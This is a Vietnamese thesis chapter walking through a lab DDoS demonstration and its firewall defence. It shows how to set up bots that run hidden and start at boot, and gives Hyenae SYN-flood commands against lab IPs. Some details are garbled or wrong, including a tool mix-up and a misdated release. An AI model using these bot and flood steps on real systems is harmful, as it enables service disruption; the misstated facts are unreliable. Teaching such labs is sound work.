Chƣơng 2 tác giả đi sâu tìm hiểu về các biện pháp đối phó tấn công DoS và DDoS, các kỹ thuật phòng thủ chống lại Botnet, Các công cụ bảo vệ khi có tấn công DoS và DDoS. Ngoài ra tác giả còn đi sâu tìm hiểu, kiểm tra các thâm nhập DoS/DdoS.Từ đó rút ra nhiều kết luận hữu ích phục vụ cho công việc Demo ở chƣơng 3.
56
CHƢƠNG 3: DEMO TẤN CÔNGVÀ PHÒNG THÙ DDOS 3.1. Kịch bản DeMo tấn công DDoS
H nh 3.1: Mô hình Demo tấn công DDoS
Trong đó:
01 Máy chủ WebServer sử dụng Windows 7 có cài sẵn XAMMP. 05 Máy trạm Botnet.
01 trang Web tự tạo để phục vụ DEMO.
Phần mềm: Vmware Workstation 12 Pro, BackTrack 5r3, Hyenaed, Wireshark, Metter.
Giới thiệu sơ lƣợc về phần mềm Vmware Workstation 12 Pro
VMware Workstation 12 Pro là sản phẩm mới nhất trong dòng sản phẩm rất thành công của VMware. Đây thực sự là công cụ hữu ích cho các lập trình viên, chuyên gia quản trị hệ thống và cả những ngƣời dùng cá nhân khi muốn khám phá, thử nghiệm hay đơn giản chỉ là xem qua cho biết một sản phẩm phần mềm mới.
Máy tính ảo, đúng với tên gọi nó có mọi chức năng nhƣ một máy tính bình thƣờng chỉ khác một điều là máy tính ảo chạy trên nền của máy tính thật. Một máy tính thật chạy phần mềm VMware Workstation 12 Pro có thể hỗ trợ vô số các máy ảo chạy trên nó với giới hạn chỉ là ở dung lƣợng ổ cứng. Các máy tính ảo có thể
57
chạy đồng thời số lƣợng tùy thuộc vào lƣợng bộ nhớ RAM của hệ thống thật, thậm chí các máy ảo này còn có thể liên lạc với nhau tạo thành một mô hình mạng ảo. Với phần mềm ảo hóa, thì nhà quản trị hệ thống có thể cài đặt một máy ảo chạy hệ điều hành mới để kiểm tra tính ổn định, các chuyên gia phát triển phần mềm có thể kiểm tra sản phẩm của mình chạy trên nền những hệ điều hành khác nhau một cách nhanh nhất, những nhà nghiên cứu phần mềm độc hại có thể phân tích một virus mới mà không hề gây tổn hại đến máy tính thật và ngƣời dùng bình thƣờng có thể chạy các phần mềm mà chỉ có thể chạy trên các hệ điều hành cũ.
Giới thiệu sơ lƣợc về phần mềm BackTrack 5r3
Phiên bản BackTrack 5 có tên mã là “Revolution” ( tạm dịch là “Cải tiến” ), phiên bản này rất đƣợc giới bảo mật (nhất là giới Hack) mong đợi; phiên bản này đƣợc phát hành vào tháng 05 năm 2011. BackTrack 5 đƣợc đặt tên theo một thuật toán đƣợc gọi là “backtracking” .BackTrack 5 cung cấp một bộ các công cụ từ crack password, pentest và scan ports .BackTrack 5 có 12 bộ các công cụ:
Information gathering: Thu thập thông tin (Trang web, máy chủ mail…)
Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về hệ điều hành, ứng dụng đƣợc sử dụng bởi mục tiêu…
Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
Web application analysis: Theo dõi, giám sát các ứng dụng web.
Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID).
Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và đƣợc truy cập vào các máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.
Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền cao nhất là điều kiện cần thiết trƣớc khi có thể cài đặt công cụ để duy trì quyền truy cập.
58
Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start Backtrack Forensics trong trình đơn khởi động.
Reverse engineering: Gỡ rối chƣơng trình hoặc tháo rời tập tin thực thi.
Giới thiệu sơ lƣợc về phần mềm Wireshark
Wireshark là một công cụ kiểm tra, theo dõi và phân tích thông tin mạng đƣợc phát triển bởi Gerald Combs. Phiên bản đầu tiên của Wireshark mang tên Ethereal đƣợc phát hành năm 1988. Đến nay, WireShark vƣợt trội về khả năng hỗ trợ các giao thức (khoảng 850 loại), từ những loại phổ biến nhƣ TCP, IP đến những loại đặc biệt nhƣ là AppleTalk và Bit Torrent.
Các tiện ích của phần mềm Wireshark: Thân thiện với ngƣời dùng: Giao diện của Wireshark là một trong những giao diện phần mềm phân tích gói dễ dùng nhất. Wireshark là ứng dụng đồ hoạ với hệ thống menu rất rõ ràng và đƣợc bố trí dễ hiểu.
Giá rẻ: Wireshark là một sản phẩm miễn phí. Bạn có thể tải về và sử dụng Wireshark cho bất kỳ mục đích nào, kể cả với mục đích thƣơng mại.
Hỗ trợ: Cộng đồng của Wireshark là một trong những cộng đồng tốt và năng động nhất của các dự án mã nguồn mở.
Hệ điều hành hỗ trợ Wireshark: Wireshark hỗ trợ hầu hết các loại hệ điều hành hiện nay.
Một số tính năng nâng cao của Wireshark:
Name Resolution: phân giải và chuyển đổi địa chỉ, hỗ trợ việc ghi nhớ. Protocol dissector: cho phép Wireshark phân chia một giao thức thành một số thành phần để phân tích.
Following TCP Streams: một trong những tính năng hữu ích nhất của Wireshark là khả năng xem các dòng TCP nhƣ là ở tầng ứng dụng Cửa sổ thống kê phân cấp
Giao thức Xem các Endpoints Cửa sổ đồ thị IO,…
59
Giới thiệu sơ lƣợc về phần mềm DU Meter
DU Meter cung cấp cho ngƣời dùng khả năng kiểm tra đƣờng truyền internet bất kỳ lúc nào. Phần mềm cho phép ngƣời dùng kiểm tra tốc độ download và upload thực tế tại các thời điểm khác nhau. DU Meter còn cung cấp tính năng bấm đồng hồ để đo chính xác thời gian download của đƣờng truyền và báo cáo lại.
DU Meter đƣợc sử dụng kiểm tra tốc độ download, upload của website, email hay các ứng dụng khác. Việc làm này giúp ích cho các lập trình viên dùng để test hoạt động của các trang web trên các server khác nhau.
DU Meter còn hiển thị biểu đồ biểu diễn tốc độ và lƣu lƣợng sử dụng internet trên đƣờng truyền nhà mình, văn phòng và có thể xuất ra file định dạng Excel, HTML để ngƣời dùng theo dõi. Hơn nữa, DU Meter còn có tính năng tự động cắt đƣờng truyền nếu thấy đƣờng truyền mạng quá thấp so với quy định.
Những tính năng chính của DU Meter:
- Kiểm tra đƣờng truyền internet bất kỳ lúc nào nhanh chóng và chính xác. - Test tốc độ download và upload của đƣờng truyền mạng để kịp thời xử lý những tình huống phát sinh.
- Cung cấp tính năng vƣợt trội và thay thế các công cụ kiểm tra tốc độ đƣờng truyền internet khác.
- Tính năng bấm đồng hồ để đo chính xác thời gian download của đƣờng truyền và báo cáo lại.
- Hiển thị biểu đồ biểu diễn tốc độ và lƣu lƣợng sử dụng internet trên đƣờng truyền nhà mình, văn phòng và có thể xuất ra file định dạng Excel, HTML.
- Tốc độ kiểm tra cực nhanh và dễ dàng sử dụng.
- Kiểm tra hoạt động của các trang web trên các server khác nhau.
- Tự động cắt đƣờng truyền nếu thấy đƣờng truyền mạng quá thấp so với quy định.
60
Giới thiệu sơ lược về phần mềm Hyenae
Hyena ra đời nhằm mục đích cung cấp cho bạn một phƣơng tiện quản trị toàn diện hệ thống mạng theo cách thức đơn giản, tập trung và duy nhất. Đƣợc sử dụng rộng rãi bởi hàng ngàn quản trị hệ thống trên toàn cầu, Hyena là một công cụ mà ngƣời quản trị không thể bỏ qua. Với giao diện và các thao tác quản lý đƣợc thiết kế theo kiểu Explorer, bao gồm cả menu ngữ cảnh tƣơng ứng với tất cả các đối tƣợng, Hyena giúp bạn quản lý gần nhƣ toàn bộ các thành phần trong mạng nhƣ: user, group, share, domain, computer, service, printer, file, session, disk space, user right, job scheduling, processes, messaging…
Hyena có thể chạy trên bất kỳ hệ điều hành Windows nào dành cho máy trạm, kể cả Windows 7. Đồng thời, công cụ này có thể quản trị bất kỳ hệ điều hành Windows nào dành cho máy chủ, kể cả Windows Server 2008.
3.2. Hƣớng dẫn tạo cuộc tấn công DDoS: 3.2.1. Cài đặt Clone máy trạm 3.2.1. Cài đặt Clone máy trạm
Bƣớc 1: Bật Vmware, cài đặt clone máy trạm: Kích chuột phải vào máy trạm BotNet01 trên thanh công cụ Manage Clone.
H nh 3.2: cài đặt Clone máy trạm
Bƣớc 6: Chọn tên Máy ảo và Thƣ mục chạy máy ảo. Đối với máy C&C: Đặt tên là C&C
61
Đối với máy trạm Botnet: Đặt tên là BOTNET01, BOTNET02, BOTNET03, Backtrack5r3…
H nh 3.3: Đặt tên cho các máy trạm
Chọn Finish và đợi hệ thống Clone
3.2.2. Khởi động máy chủ Webserver và thiết lập cấu hình
62
H nh 3.4:Cấu hình máy chủ WebServer
Cấu hình Network Adapter: Chọn Custom VMnet1
H nh 3.5: Thiết lập các cấu hình cho Webserver
63
H nh 3.6: Cài đặt địa chỉ IP cho máy chủ
Khởi động dịch vụ XAMPP, chạy Apache
H nh 3.7: Thiết lập thông số cho XAMPP
64
H nh 3.8: Giao diện khi chạy Apache
Truy cập đƣờng dẫn http://192.168.88.128 để kiểm tra dịch vụ
65
3.2.3 Khởi động máy chủ Botnet
Đảm bảo cấu hình card mạng phải để ở chế độ Bridged
H nh 3.1 : Giao diện BOTNET01
Đặt ip cho máy BOTNET01 nhƣ sau
66
Các máy khác có thể đặt thêm nhƣ BOTNET02 192.168.1.102, BOTNET03 192.168.1.103….
Kiểm tra kết nối tới máy Firewall và máy chủ Web Server
H nh 3.12: Kiểm tra kết nối của BOTNET tới Firewall và máy chủ Webserver
Tạo Bot lắng nghe trên cổng 666
Trong thƣ mục C:\Program Files\Hyenae chọn new text Document Nội dung file điền nhƣ sau:
67
Save file và đổi tên file thành Botnet.bat. Lƣu ý trƣớc khi đổi bỏ chọn Hide extensions for known file types
H nh 3.13: Cách tạo file Botnet.Bat
H nh 3.14: Giao diện sau khi tạo file Botnet.Bat
68
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save và đổi tên file thành invisible.vbs
H nh 3.15: Giao diện sau khi tạo file Invisible.vbs
Tiếp tục tạo 01 file text mới với nội dung nhƣ sau:
wscript.exe "C:\Program Files\Hyenae\invisible.vbs" "C:\Program Files\Hyenae\Botnet.bat"
69
H nh 3.16: Giao diện sau khi tạo file Botnetstartup.bat
Tạo shortcut cho file Botnetstartup.bat
H nh 3.17: Tạo shortcut cho file Botnetstartup.bat
Copy file shortcut vào thƣ mục C:\Documents and Settings\All Users\Start Menu\Programs\Startup ( Nhằm mục đích mỗi khi máy tính khởi động lại file này sẽ tự chạy. Sẽ chạy ẩn tiến trình)
70
H nh 3.18: Đƣờng dẫn cho file Botnetstartup.bat
Chạy file Botnetstartup.bat nếu chƣa đƣợc chạy (Sau này mỗi lần khởi động lại máy trạm sẽ không cần chạy file này nữa). Kiểm tra xem tiến trình có chạy không? Đảm bảo có tiến trình Hyenaed.exe là ok.
H nh 3.19: Kiểm tra cấu hình file Hyenaed.exe trong cmd.exe
Vậy là xong phần setup máy BOTNET. GIờ đến phần C&C Server.
Nếu muốn thêm máy BOTNET khác có thể Clone luôn từ máy này. Làm tƣơng tự các bƣớc nhƣ trên để tạo thêm máy BOTNET.
71
3.2.4. Khởi động máy chủ C&C Server và thực hiện tấn công.
Khởi động máy chủ C&C Server
Xác định địa chỉ MAC của Gateway (là Interface E0/0 trên Firewall).
H nh 3.2 : Địa chỉ MAC của C&C Server
Điều khiển tấn công máy chủ webserver từ máy chủ C&C Server
H nh 3.21: Giao diện máy C&C
72
hyenae.exe -r 192.168.1.101@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1 Trong đó 00:ab:cd:92:52:00 là địa chỉ MAC của Gateway
192.168.1.101 là địa chỉ IP của máy BOTNET01
Để điều khiển máy BOTNET02 với IP 192.168.1.102 ta vào cmd gõ lệnh sau: hyenae.exe -r 192.168.1.102@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1 Để điều khiển máy BOTNET03 với IP 192.168.1.103 ta vào cmd gõ lệnh sau:
hyenae.exe -r 192.168.1.103@666 -A 4 -a tcp -s %-%@80 -d 00:ab:cd:92:52:00-192.168.88.128@80 -f S -t 128 -k 0 -w 0 -q 0 -Q 1
H nh 3.22: Giao diện C&C khi đặt lệnh tấn công
73
H nh 3.23: Trƣớc khi tấn công DDDoS xảy ra
Khi tấn công DDoS xảy ra:
Vào cái Tool HyenaeFE rồi chọn nút Excute : nhƣ vậy đã bắt đầu thực thiện các cuộc tấn công Botnet.
Khi bị tấn công mình kiểm tra xem wireshark nó sẽ bắt đƣợc gói tin đã gửi tới Server và trang webserver sẽ khó vào và thậm chí mất kết nối.
74
H nh 3.24: Wireshark bắt gói tin trong khi tấn công DDoS xảy ra
DU meter đã bắt đƣợc các lƣợng tin khá nhiều.
H nh 3.25: DU meter bắt lƣợng tin khi DDoS xảy ra
Sau khi tấn công DDoS xảy ra: Vào trang Web sẽ chậm đi có lúc đƣợc có lúc không. Trang web đã bị mất kết nối tới server:
75
H nh 3.26: Trang web bị mất kết nối
DU Meter bắt đƣợc lƣợng tin:
H nh 3.27: DU Meter bắt đƣợc lƣợng tin khi DDoS
76
H nh 3.28: Wireshark bắt đƣợc 10 gói SYN
Truy cập vào web không còn
H nh 3.29: Web đã bị sập sau khi DDoS 3.3. Phần Phòng thủ.
77 Khởi động GNS3 và chọn EditPreferences
H nh 3.3 : Cấu hình Firewall ASA
1)Chọn Qemu ASA và điền các thông tin sau -Identifier Name: ASA-LAB
- Initrd: Chọn file asa802-k8.initrd-asdm_webvpn_mcontext_menu_v3-lite.gz - Kernel chọn file asa802-k8.kernel
- Chọn Apply và Ok
B2: Sau đó chuyển qua Tab General Setting thay đổi đƣờng dẫn Working Directory sang thƣ mục bất kỳ (Không phải TEMP). Chọn Apply và Ok
B3: Kéo thả Firewall ASA
78
H nh 3.31: Mô hình phòng thủ
B5: Kích chuột phải vào Cloud chọn Configure
B6: Chọn Card Local are network Add và tiếp tục chọn VMNET1 Add B7: Chọn Apply và Ok
B8: Nối dây cho hệ thống nhƣ sau: - ASA1 cổng E0 SW1 cổng 1
- SW1 cổng 2 C1 cổng Local Area Network - ASA1 cổng E1 SW2 cổng 1
79
H nh 3.32: Thiết lập kết nối cho mô hình phòng thủ
B9: Sau đó khởi động Firewall
B10: Kích chuột phải vào Firewall chọn Console
B11: Sau khi chọn Cửa sổ console hiện lên chọn 3 Enter và nhấn tiếp phím Enter để tiếp tục
H nh 3.33: Thiết lập cho ASA
B12: Firewall khởi động lên xong sẽ có màn hình hiển thị nhƣ sau:
80
B13: Thực hiện cấu hình Firewall sử dụng các lệnh nhƣ sau:
- Gõ enable và enter để vào mode configure (Nhấn tiếp Enter khi Firewall yêu cầu nhập mật khẩu).
- Cấu hình tiếp nhƣ sau:
B14: Thực hiện ping tới máy chủ Webserver 192.168.88.128 kiểm tra kết nối
Nhƣ vậy là hoàn thiện phần cấu hình Firewall cho DEMO phần hạn chế syn Flood sẽ đề cập sau.
B15: Khởi động máy chủ C&C Server và thực hiện tấn công. - Khởi động máy chủ C&C Server
- Xác định địa chỉ MAC của Gateway (là Interface E0/0 trên Firewall). configure terminal hostname ASA-LAB interface ethernet 0/0 no shutdown nameif outside ip address 192.168.1.1 255.255.255.0 interface ethernet 0/1 no shutdown nameif inside ip address 192.168.88.1 255.255.255.0 exit ASA-LAB(config)# ping 192.168.88.128 Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.88.128, timeout is 2 seconds: !!!!!
81
H nh 3.35: Xác định địa chỉ MAC của Gateway
B16: Khi tấn công ta có thể view kết nối trên Firewall nhƣ sau: có tới hơn 2300 kết nối syn tới máy chủ web 192.168.88.128
82
B17: Đây là phần capture dữ liệu trên máy chủ webserver sử dụng wireshark, Có thể thấy rất nhiều kết nối khởi tạo tới với cờ Syn
B18: Để phòng thủ làm nhƣ sau:
Vào firewall ASA thực hiện cấu hình nhƣ sau:
B19: Thiết lập nhƣ thế là xong. Khi thực hiện tấn công DDoS, Wireshark bắt đƣợc